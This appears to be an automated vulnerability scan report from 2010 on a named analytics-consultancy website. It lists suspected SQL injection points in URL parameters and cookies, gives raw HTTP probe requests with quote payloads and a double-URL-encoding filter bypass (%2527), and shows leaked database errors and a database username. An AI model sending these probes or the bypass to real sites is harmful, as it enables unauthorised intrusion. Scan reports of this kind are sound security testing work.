GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html%2527%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:58:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
1.53. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html?1'=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:54:09 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html?1''=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:54:10 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:54:13 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:54:13 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/56-seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:31:41 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/56-seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527%2527;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:31:42 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:31:43 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:31:43 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27790
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:18:31 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:18:34 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:18:35 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:18:35 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25557
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/62-urchin/118-urchin-7-now-available.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:39:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/62-urchin/118-urchin-7-now-available.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:39:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:39:11 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:39:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28924
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html'?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 07:21:22 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html''?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 07:21:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:21:28 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:21:28 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:07:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:07:35 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:07:37 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:07:37 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23684
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:10:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:10:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:10:28 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:10:29 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:08:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/62-urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:08:37 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
